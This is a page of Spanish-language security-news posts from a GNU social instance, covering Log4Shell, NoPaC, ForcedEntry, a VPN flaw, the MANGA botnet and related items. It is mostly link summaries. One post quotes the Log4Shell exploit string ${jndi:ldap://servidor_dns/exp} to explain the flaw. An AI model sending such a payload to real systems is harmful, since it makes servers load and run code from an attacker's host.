Bobinas P4G
  • Login
  • Public

    • Public
    • Groups
    • Popular
    • People

Notices tagged with seguridad, page 4

  1. Arfran (obiolsfriendica@libranet.de)'s status on Saturday, 15-Jan-2022 22:48:05 UTC Arfran Arfran
    ♲ @asrafil@pod.geraspora.de:#RaspberryPi puede encontrar #malware en un dispositivo gracias a ondas electromagnéticas y sin usar software adicional
    Una Raspberry Pi puede identificar malware con ondas electromagnéticas y sin utilizar software adicional. Un equipo de investigadores del Instituto de Investigación de Ciencias Informáticas y Sistemas Aleatorios (IRISA o Institute of Computer Science and Random Systems) de Francia ha publicado un nuevo artículo en el que se detalla cómo han logrado esta hazaña.

    A diferencia de otros sistemas de detección de malware que se basan en el software, el nuevo sistema de IRISA utiliza un osciloscopio (Picoscope 6407) y una sonda H-Field, además de una Raspberry Pi 2B, para escanear dispositivos en busca de ondas electromagnéticas (EM) específicas.www.genbeta.com/actualidad/ras…
    #Ñ #seguridad
    In conversation Saturday, 15-Jan-2022 22:48:05 UTC from libranet.de permalink
  2. Arfran (obiolsfriendica@libranet.de)'s status on Saturday, 15-Jan-2022 22:48:05 UTC Arfran Arfran
    ♲ @asrafil@pod.geraspora.de:#RaspberryPi puede encontrar #malware en un dispositivo gracias a ondas electromagnéticas y sin usar software adicional
    Una Raspberry Pi puede identificar malware con ondas electromagnéticas y sin utilizar software adicional. Un equipo de investigadores del Instituto de Investigación de Ciencias Informáticas y Sistemas Aleatorios (IRISA o Institute of Computer Science and Random Systems) de Francia ha publicado un nuevo artículo en el que se detalla cómo han logrado esta hazaña.

    A diferencia de otros sistemas de detección de malware que se basan en el software, el nuevo sistema de IRISA utiliza un osciloscopio (Picoscope 6407) y una sonda H-Field, además de una Raspberry Pi 2B, para escanear dispositivos en busca de ondas electromagnéticas (EM) específicas.www.genbeta.com/actualidad/ras…
    #Ñ #seguridad
    In conversation Saturday, 15-Jan-2022 22:48:05 UTC from libranet.de permalink

    Attachments


    1. https://i.blogs.es/d444f1/1366_2000/1366_2000.jpg
  3. davidochobits (davidochobits@mastodon.social)'s status on Tuesday, 04-Jan-2022 18:19:06 UTC davidochobits davidochobits

    Anonsurf o cómo trabajar de forma anónima

    https://www.ochobitshacenunbyte.com/2022/01/04/anonsurf-o-como-trabajar-de-forma-anonima/

    #anonsurf #tor #kali #parrot #security #seguridad #linux

    In conversation Tuesday, 04-Jan-2022 18:19:06 UTC from mastodon.social permalink
  4. davidochobits (davidochobits@mastodon.social)'s status on Monday, 03-Jan-2022 14:26:09 UTC davidochobits davidochobits

    Un vistazo a Parrot Security OS

    https://www.ochobitshacenunbyte.com/2022/01/03/un-vistazo-a-parrot-security-os/

    #ParrotSecurityOS #parrot #debian #seguridad #security

    In conversation Monday, 03-Jan-2022 14:26:09 UTC from mastodon.social permalink
  5. asrafil@pod.geraspora.de (asrafil@pod.geraspora.de)'s status on Friday, 17-Dec-2021 19:55:20 UTC asrafil@pod.geraspora.de asrafil@pod.geraspora.de

    "Internet está en llamas": #Cloudflare ha detectado más de 24.600 ataques por minuto que explotaban la vulnerabilidad #Log4Shell

    De la grave vulnerabilidad Log4Shell (que afecta a la librería open source Log4J permitiendo ataques de ejecución de código remoto) hemos hablado ya en esta última semana: desde las condiciones en que trabajan los desarrolladores encargados de parchearla, hasta la presencia de la vulnerabilidad en uno de los vehículos de la NASA que está explorando ahora mismo marte.

    El problema al que se enfrenta Internet con Log4Shell es que al contrario que otros #ciberataques relevantes de los últimos tiempos, que afectaban a un número limitado de productos de software (en muchos casos sólo a uno), Log4j está integrado en prácticamente cada servicio web basado en Java.
    Todos los ciberdelincuentes del mundo, a la caza de exploits

    https://www.genbeta.com/actualidad/internet-esta-llamas-cloudflare-ha-detectado-24-600-ataques-minuto-que-explotaban-vulnerabilidad-log4shell
    #Ñ #seguridad

    In conversation Friday, 17-Dec-2021 19:55:20 UTC from pod.geraspora.de permalink

    Attachments

    1. "Internet está en llamas": Cloudflare ha detectado más de 24.600 ataques por minuto que explotaban la vulnerabilidad Log4Shell
      from @MarcosMerino_B
      De la grave vulnerabilidad Log4Shell (que afecta a la librería open source Log4J permitiendo ataques de ejecución de código remoto) hemos hablado ya en esta...
  6. asrafil@pod.geraspora.de (asrafil@pod.geraspora.de)'s status on Friday, 17-Dec-2021 18:11:09 UTC asrafil@pod.geraspora.de asrafil@pod.geraspora.de

    Explotación de CVE-2021-42278 y CVE-2021-42287 para ownear el DA con cualquier usuario de dominio

    En medio de la tormenta #Log4Shell hay una cadena de vulnerabilidades (NoPaC, sAMAccountName) que está pasando algo desapercibida pero mediante la cual cualquier persona dentro de la red podría usar para ownear un DC. Hablamos de CVE-2021-42287 y CVE-2021-42278...

    https://www.hackplayers.com/2021/12/explotacion-cve-2021-42278-y-42287.html
    #Ñ #seguridad

    In conversation Friday, 17-Dec-2021 18:11:09 UTC from pod.geraspora.de permalink

    Attachments

    1. Explotación de CVE-2021-42278 y CVE-2021-42287 para ownear el DA con cualquier usuario de dominio
      from vmotos vis0r
      En medio de la tormenta #Log4Shell hay una cadena de vulnerabilidades (NoPaC, sAMAccountName) que está pasando algo desapercibida pero media...
  7. asrafil@pod.geraspora.de (asrafil@pod.geraspora.de)'s status on Friday, 17-Dec-2021 17:10:02 UTC asrafil@pod.geraspora.de asrafil@pod.geraspora.de

    Ventajas e inconvenientes de abrir puertos usando #DMZ

    En la mayoría de ocasiones para realizar nuestras tareas cotidianas en Internet no necesitamos hacer nada especial. Un ejemplo claro de esto es la navegación web que realizamos utilizando nuestros navegadores en diferentes sistemas operativos y equipos. No obstante, algunos programas P2P, cuando quieres montar algún servidor web o FTP y también algunos juegos de videoconsolas requieren que se abran unos puertos concretos. En caso de no hacerlo podremos experimentar una bajada de rendimiento importante como en los programas P2P e incluso que no funcionen. Entonces podremos optar por dos estrategias bien diferenciadas. Una sería abrir únicamente los puertos que necesitamos y otra utilizar DMZ. En este artículo vamos a ver las ventajas e inconvenientes de abrir puertos usando DMZ.

    Quizás en alguna ocasión es posible que hayas tenido que entrar a la configuración del router para cambiar la clave del Wi-Fi u otra tarea y en alguno de sus apartados hayas visto escrito DMZ. En ese aspecto, nos encontramos con una forma de abrir puertos usando DMZ, que tiene sus particularidades, y también peligros. A continuación, vamos a ver qué es y luego veremos sus ventajas e inconvenientes.

    https://www.redeszone.net/noticias/redes/ventajas-inconvenientes-abrir-puertos-usando-dmz/
    #Ñ #seguridad

    In conversation Friday, 17-Dec-2021 17:10:02 UTC from pod.geraspora.de permalink

    Attachments

    1. Ventajas e inconvenientes de abrir puertos usando DMZ
      Descubre qué es la DMZ y todas las ventajas e inconvenientes si lo utilizamos para abrir puertos, en lugar de abrir puertos individualmente
  8. asrafil@pod.geraspora.de (asrafil@pod.geraspora.de)'s status on Friday, 17-Dec-2021 16:18:40 UTC asrafil@pod.geraspora.de asrafil@pod.geraspora.de

    Google descubre un #exploit muy avanzado que ataca a los #iPhone: "es un arma contra la que no hay defensa"

    Project Zero de Google, el equipo que busca mejorar la seguridad en internet desde su nacimiento en 2014, ha descubierto un exploit muy potente. Dicen los investigadores que es "uno de los exploits más sofisticados técnicamente que hemos visto jamás, y que está al nivel de ataques de los espías de las naciones-estado más avanzadas".

    ForcedEntry para iOS ha sido desarrollado por el grupo de hackers israelí NSO Group. Cabe recordar aquí que 'NSO Group' es una empresa israelí responsable del desarrollo de Pegasus (spyware con el que, supuestamente, se hackeó a Jeff Bezos), así como de código capaz de instalar spyware en aplicaciones como WhatsApp.

    https://www.genbeta.com/actualidad/google-descubre-exploit-muy-avanzado-que-ataca-a-iphone-arma-que-no-hay-defensa
    #Ñ #seguridad

    In conversation Friday, 17-Dec-2021 16:18:40 UTC from pod.geraspora.de permalink

    Attachments

    1. Google descubre un exploit muy avanzado que ataca a los iPhone: "es un arma contra la que no hay defensa"
      from Bárbara Bécares
      Project Zero de Google, el equipo que busca mejorar la seguridad en internet desde su nacimiento en 2014, ha descubierto un exploit muy potente. Dicen los...
  9. asrafil@pod.geraspora.de (asrafil@pod.geraspora.de)'s status on Thursday, 16-Dec-2021 22:30:15 UTC asrafil@pod.geraspora.de asrafil@pod.geraspora.de

    Detectaron una vulnerabilidad que afecta a más de 10,000 servidores #vpn   | Desde Linux

    Hace poco un grupo de investigadores dieron a conocer una vulnerabilidad con una clasificación de gravedad de 9,8 sobre 10, esto después de que dieran 1 año de gracia antes de que divulgarán dicha información.
    Se menciona que aproximadamente 10,000 servidores corporativos que utilizan la VPN afectada.

    Se ha demostrado que aproximadamente 10,000 servidores corporativos que utilizan Palo Alto Networks GlobalProtect VPN son vulnerables a un error de desbordamiento de búfer que se solucionó solo 12 meses después del descubrimiento.

    La vulnerabilidad identificada por CVE-2021-3064 A es de 9,8 sobre 10 y se produce cuando se escanea la entrada proporcionada por el usuario en una ubicación de longitud fija en la pila.

    https://blog.desdelinux.net/detectaron-una-vulnerabilidad-que-afecta-a-mas-de-10000-servidores-vpn/
    #Ñ #seguridad

    In conversation Thursday, 16-Dec-2021 22:30:15 UTC from pod.geraspora.de permalink

    Attachments

    1. Detectaron una vulnerabilidad que afecta a más de 10,000 servidores vpn  
      from Darkcrizt
      Hace poco un grupo de investigadores dieron a conocer una vulnerabilidad con una clasificación de gravedad de 9,8 sobre 10, esto después de que dieran 1
  10. asrafil@pod.geraspora.de (asrafil@pod.geraspora.de)'s status on Thursday, 16-Dec-2021 22:25:40 UTC asrafil@pod.geraspora.de asrafil@pod.geraspora.de

    Una segunda vulnerabilidad de #Log4j obliga a actualizar

    En los últimos días hemos sido testigos de una nueva y grave vulnerabilidad que afecta a la popular librería de registro de Java Log4j. En este artículo nos hacemos eco de cómo los piratas informáticos están comenzando a explotar una segunda vulnerabilidad de Log4j. Una vez más, se hace imprescindible que los usuarios actualicen los sistemas y puedan corregir lo antes posible estas vulnerabilidades para evitar así ser víctimas de ataques.

    https://www.redeszone.net/noticias/seguridad/segunda-vulnerabilidad-log4j/
    #Ñ #seguridad

    In conversation Thursday, 16-Dec-2021 22:25:40 UTC from pod.geraspora.de permalink

    Attachments

    1. No result found on File_thumbnail lookup.
      Una segunda vulnerabilidad de Log4j obliga a actualizar
      Nuevamente una vulnerabilidad de Log4j vuelve a ser explotada y es imprescindible actualizar los parches con la nueva versión para evitarla.
  11. asrafil@pod.geraspora.de (asrafil@pod.geraspora.de)'s status on Thursday, 16-Dec-2021 19:59:25 UTC asrafil@pod.geraspora.de asrafil@pod.geraspora.de

    El #dispositivohackeable más lejano se encuentra en Marte: el dron #Ingenuity tiene instalada una copia no parcheada de #Log4J

    El helicóptero Ingenuity, que sobrevuela desde hace meses la superficie del planeta Marte, ejecutó recientemente su trayecto número 17 (pese a que los planes originales contemplaban únicamente la realización de 5 de ellos). Al contrario que en los dieciséis anteriores, en los que todo fue sobre ruedas, esta vez algo falló…

    …la comunicación entre Ingenuity y el rover Perseverance se interrumpió inesperadamente mientras el helicóptero descendía, y han hecho falta varios días para recuperar los datos de telemetría y confirmar que el vuelo fue exitoso (tanto, que estableció un nuevo récord de más de 30 minutos de vuelo).

    https://www.genbeta.com/seguridad/dispositivo-hackeable-lejano-se-encuentra-marte-dron-ingenuity-tiene-instalada-copia-no-parcheada-log4j
    #Ñ #seguridad

    In conversation Thursday, 16-Dec-2021 19:59:25 UTC from pod.geraspora.de permalink

    Attachments

    1. No result found on File_thumbnail lookup.
      El dispositivo hackeable más lejano se encuentra en Marte: el dron Ingenuity tiene instalada una copia no parcheada de Log4J
      from @MarcosMerino_B
      El helicóptero Ingenuity, que sobrevuela desde hace meses la superficie del planeta Marte, ejecutó recientemente su trayecto número 17 (pese a que los planes...
  12. asrafil@pod.geraspora.de (asrafil@pod.geraspora.de)'s status on Tuesday, 14-Dec-2021 16:17:48 UTC asrafil@pod.geraspora.de asrafil@pod.geraspora.de

    Este fallo permite a un atacante controlar un sistema con #Ubuntu

    Ubuntu es una de las distribuciones de Linux más populares. Una vulnerabilidad afecta a este sistema operativo y pone en riesgo a los usuarios. Se trata de un fallo que permite a un atacante obtener privilegios root y tomar el control total. Esto lo consigue al explotar un error de corrupción de memoria doble libre en el componente AccountsService de GNOME.

    https://www.redeszone.net/noticias/seguridad/fallo-permisos-root-ubuntu/
    #Ñ #seguridad

    In conversation Tuesday, 14-Dec-2021 16:17:48 UTC from pod.geraspora.de permalink

    Attachments

    1. Este fallo permite a un atacante controlar un sistema con Ubuntu
      Conoce cómo funciona el último fallo de seguridad que afecta a Ubuntu y permite obtener permisos root en el sistema y cómo corregirlo.
  13. asrafil@pod.geraspora.de (asrafil@pod.geraspora.de)'s status on Monday, 13-Dec-2021 16:03:30 UTC asrafil@pod.geraspora.de asrafil@pod.geraspora.de

    #HackMyVM: el sitio libre donde encontrarás máquinas boot2root y más

    HackMyVM es una plataforma que ofrece un entorno de entrenamiento y aprendizaje sobre conceptos de seguridad informática totalmente gratuito.
    En ella podremos encontrar máquinas virtuales con ciertas vulnerabilidades totalmente diferentes entre ellas, en las que se pueden llegar a aprender conceptos tales como exploits, cifrados, cross-site scripting, ingeniería inversa, inyecciones SQL, inyección de código, etc...

    Estamos hablando de una cantidad a día de hoy de 135 máquinas a nuestra disposición, por lo que nada tiene que envidiar a otras plataformas del sector.
    Algo a destacar es que estas máquinas, las cuales van apareciendo continuamente, son creadas por los propios usuarios. Lo que hace que se forme una gran comunidad y un muy buen ambiente.

    https://www.hackplayers.com/2021/12/hackmyvm-boot2root-gratis.html
    #Ñ #seguridad

    In conversation Monday, 13-Dec-2021 16:03:30 UTC from pod.geraspora.de permalink

    Attachments

    1. HackMyVM: el sitio libre donde encontrarás máquinas boot2root y más
      from vmotos vis0r
      Sin lugar a dudas, la iniciación al sector de Hacking o Pentesting es una tarea muy complicada por la cantidad de conceptos que deben asimil...
  14. asrafil@pod.geraspora.de (asrafil@pod.geraspora.de)'s status on Monday, 13-Dec-2021 15:48:54 UTC asrafil@pod.geraspora.de asrafil@pod.geraspora.de

    La nueva función antiespionaje de #WhatsApp no acabará con el problema: esto es lo que pueden hacer con “En línea”

    Hoy hemos amanecido con la noticia de que WhatsApp ha implementado una nueva función de privacidad por defecto, por la cual se limitará mucho quién puede ver nuestro estado "En línea". Con esta medida, además, se dice adiós a las webs y servicios que sirven exclusivamente para espiar este estado y contabilizar cuánto tiempo pasa en línea una persona y cuántas veces al día se conecta.

    Esta nueva política de WhatsApp es algo a aplaudir, pues de un plumazo acaba con uno de los puntos más problemáticos de la privacidad en la plataforma de mensajería. Sin embargo, atendiendo a los detalles técnicos que han aportado, sigue sin ser suficiente cuando tenemos en cuenta la toxicidad que puede llegar a existir en la cabeza de las personas.

    https://www.genbeta.com/mensajeria-instantanea/nueva-funcion-privacidad-whatsapp-no-acabara-problema-espionaje-esto-que-pueden-hacer-linea
    #Ñ #seguridad #privacidad

    In conversation Monday, 13-Dec-2021 15:48:54 UTC from pod.geraspora.de permalink

    Attachments

    1. La nueva función antiespionaje de WhatsApp no acabará con el problema: esto es lo que pueden hacer con “En línea”
      from @ansamor
      Hoy hemos amanecido con la noticia de que WhatsApp ha implementado una nueva función de privacidad por defecto, por la cual se limitará mucho quién puede ver...
  15. asrafil@pod.geraspora.de (asrafil@pod.geraspora.de)'s status on Monday, 13-Dec-2021 15:40:28 UTC asrafil@pod.geraspora.de asrafil@pod.geraspora.de

    #RCE en #Log4j (#log4shell): sencillo de explotar y presente en numerosas apps

    Recientemente se ha publicado un exploit de día 0 en log4j, la popular librería de Java desarrollada por la Apache Foundation que da como resultado la ejecución remota de código (RCE) al loggear una determinada cadena con la sintaxis ${jndi:ldap://servidor_dns/exp}. Así de sencillo:

    https://www.hackplayers.com/2021/12/ce-en-log4j-log4shell-simple-exploit.html
    #Ñ #seguridad

    In conversation Monday, 13-Dec-2021 15:40:28 UTC from pod.geraspora.de permalink

    Attachments

    1. RCE en Log4j (#log4shell): sencillo de explotar y presente en numerosas apps
      from vmotos vis0r
      Recientemente se ha publicado un exploit de día 0 en log4j, la popular librería de Java desarrollada por la Apache Foundation que da como re...
  16. asrafil@pod.geraspora.de (asrafil@pod.geraspora.de)'s status on Monday, 13-Dec-2021 15:35:47 UTC asrafil@pod.geraspora.de asrafil@pod.geraspora.de

    #Log4Shell: conoce si eres vulnerable y soluciona este grave fallo

    Log4Shell es la última vulnerabilidad que trae de cabeza a muchos administradores que han visto cómo sus servidores son vulnerables a ataques remotos. Se trata de un fallo de seguridad severo, que puede ser explotado de una manera sencilla. Además, puede afectar a una gran cantidad de usuarios. Se ha descubierto que afecta a servicios en la nube como Apple iCloud o Steam. En este artículo explicamos qué es exactamente, cómo funciona y por supuesto qué hacer para solucionar este problema.

    https://www.redeszone.net/noticias/seguridad/corregir-vulnerabilidad-log4shell/
    #Ñ #seguridad

    In conversation Monday, 13-Dec-2021 15:35:47 UTC from pod.geraspora.de permalink

    Attachments

    1. Log4Shell: conoce si eres vulnerable y soluciona este grave fallo
      Conoce cómo puedes saber si tu sistema es vulnerable a Log4Shell y qué debes hacer para solucionar este grave fallo de seguridad.
  17. asrafil@pod.geraspora.de (asrafil@pod.geraspora.de)'s status on Monday, 13-Dec-2021 15:30:26 UTC asrafil@pod.geraspora.de asrafil@pod.geraspora.de

    Tres desarrolladores que trabajan gratis han evitado pérdidas millonarias a algunas de las mayores compañías tecnológicas del mundo

    La difusión el pasado jueves de una vulnerabilidad 'zero day' que afecta potencialmente a millones de usuarios de cientos de populares servicios online (de Minecraft a iCloud, pasando por Steam, Cloudflare, etcétera) ha obligado administradores de todo el mundo a realizar actualizaciones urgentes para cerrarles las puertas a los cibercriminales.

    La vulnerabilidad, conocida como 'CVE-2021-44228' o 'Log4Shell', fue descubierta por Chen Zhaojun (ingeniero de software de Alibaba), y afecta a Apache Log4j, una biblioteca open source desarrollada por la Apache Foundation que facilita a aplicaciones del ecosistema Java mantener un registro de actividades realizadas en tiempo de ejecución.

    Por ahora, la vulnerabilidad se ha usado sobre todo para difundir malware de criptominado, pero dado que permite la ejecución remota de código en varias de las aplicaciones web más populares, sus efectos si éstas no la parchean inmediatamente pueden ser mucho más graves.

    De hecho, se le ha asignado un 10/10 en el CVSS (Common Vulnerability Scoring System), un estándar de medición de la gravedad de vulnerabilidades, y en estos días se ha detectado actividad sospechosa (mayoritariamente procedente de la red Tor) escaneando masivamente la presencia de esta vulnerabilidad en servidores web.

    https://www.genbeta.com/desarrollo/tres-desarrolladores-que-trabajan-gratis-han-parcheado-24-horas-grave-vulnerabilidad-que-amenazaba-a-millones-usuarios
    #Ñ #seguridad

    In conversation Monday, 13-Dec-2021 15:30:26 UTC from pod.geraspora.de permalink

    Attachments

    1. Tres desarrolladores que trabajan gratis han evitado pérdidas millonarias a algunas de las mayores compañías tecnológicas del mundo
      from @MarcosMerino_B
      La difusión el pasado jueves de una vulnerabilidad 'zero day' que afecta potencialmente a millones de usuarios de cientos de populares servicios online (de...
  18. asrafil@pod.geraspora.de (asrafil@pod.geraspora.de)'s status on Friday, 10-Dec-2021 17:58:28 UTC asrafil@pod.geraspora.de asrafil@pod.geraspora.de

    #Confianzacero: ¿es una buena solución para el ransomware?

    Estamos en una época de transición hacia un mundo cada vez más digital. Las soluciones tradicionales que hasta hace unos años era útiles ahora ya no lo son. El auge del teletrabajo y el trabajo en la nube han cambiado nuestra forma de trabajar. Ahora podemos acceder a los archivos desde cualquier lugar pero eso implica también unos cambios en cuanto a materia de seguridad. En ese aspecto las organizaciones deben adaptarse a la nueva realidad. Las empresas de ciberseguridad están lanzando un nuevo concepto de confianza cero, ¿es una buena solución para protegernos de los peligros del ransomware?

    https://www.redeszone.net/noticias/seguridad/confianza-cero-solucion-contra-ransomware/
    #Ñ #seguridad

    In conversation Friday, 10-Dec-2021 17:58:28 UTC from pod.geraspora.de permalink

    Attachments

    1. Confianza cero: ¿es una buena solución para el ransomware?
      Las empresas de ciberseguridad están lanzando el concepto confianza cero y planteamos si es buena solución para protegernos del ransomware.
  19. asrafil@pod.geraspora.de (asrafil@pod.geraspora.de)'s status on Thursday, 09-Dec-2021 19:01:57 UTC asrafil@pod.geraspora.de asrafil@pod.geraspora.de

    La #botnet MANGA se hace con el control de #routers #TP-Link vulnerables

    El equipo de FortiGuard Labs ha encontrado diferentes muestras de malware que se está distribuyendo de forma masiva, con el objetivo de atacar a los routers de TP-Link afectados por una vulnerabilidad RCE que se ha hecho pública hace unas dos semanas. La nueva botnet denominada como MANGA, que está basada en la popular botnet Dark-Mirai, se centra específicamente en este tipo de dispositivos de TP-Link vulnerables para seguir atacando. El equipo de FortiGuard Labs le ha llamado la atención que tienen una actualización contínua de nuevas vulnerabilidades, más que otras campañas de malware que hayan visto hasta el momento.

    Esta nueva variante del malware distribuye muestras basadas en el código fuente publicado de Mirai, debemos recordar que la botnet Mirai realiza ataques distribuidos de denegación de servicio (DDoS) a gran escala, y esta botnet ha estado monitorizada por FortiGuard Labs durante mucho tiempo.

    https://www.redeszone.net/noticias/seguridad/botnet-manga-control-miles-routers-tp-link-vulnerables/
    #Ñ #seguridad

    In conversation Thursday, 09-Dec-2021 19:01:57 UTC from pod.geraspora.de permalink

    Attachments

    1. La botnet MANGA se hace con el control de routers TP-Link vulnerables
      Conoce cómo la botnet MANGA se hace con el control de routers TP-Link vulnerables, pueden ser atacados si no actualizas el firmware
  20. asrafil@pod.geraspora.de (asrafil@pod.geraspora.de)'s status on Thursday, 09-Dec-2021 18:59:44 UTC asrafil@pod.geraspora.de asrafil@pod.geraspora.de

    Los hacks en Google Cloud se utilizan para el minado de criptomonedas

    Cada vez es más frecuente que tengamos más cosas almacenadas en la nube. Nos brinda la posibilidad de acceder a nuestros contenidos personales y de trabajo desde cualquier lugar. Lo único que necesitamos es una conexión a Internet para poder trabajar con nuestros servicios en la nube. Los ciberdelincuentes siempre andan buscando beneficios y los han encontrado vulnerando las cuentas de Google Cloud. En este artículo vamos a ver cómo los hacks en Google Cloud se utilizan para el minado ilegal de criptomonedas.

    https://www.redeszone.net/noticias/seguridad/hacks-google-cloud-minado-criptomonedas/
    #Ñ #seguridad

    In conversation Thursday, 09-Dec-2021 18:59:44 UTC from pod.geraspora.de permalink

    Attachments

    1. Los hacks en Google Cloud se utilizan para el minado de criptomonedas
      Vamos a ver cómo los hacks en Google Cloud se utilizan para el minado de criptomonedas ilegal, alojar malware en la nube, mandar Spam y más.
  • After
  • Before

Feeds

  • Activity Streams
  • RSS 1.0
  • RSS 2.0
  • Atom
  • Help
  • About
  • FAQ
  • Privacy
  • Source
  • Version
  • Contact

Bobinas P4G is a social network. It runs on GNU social, version 2.0.1-beta0, available under the GNU Affero General Public License.

Creative Commons Attribution 3.0 All Bobinas P4G content and data are available under the Creative Commons Attribution 3.0 license.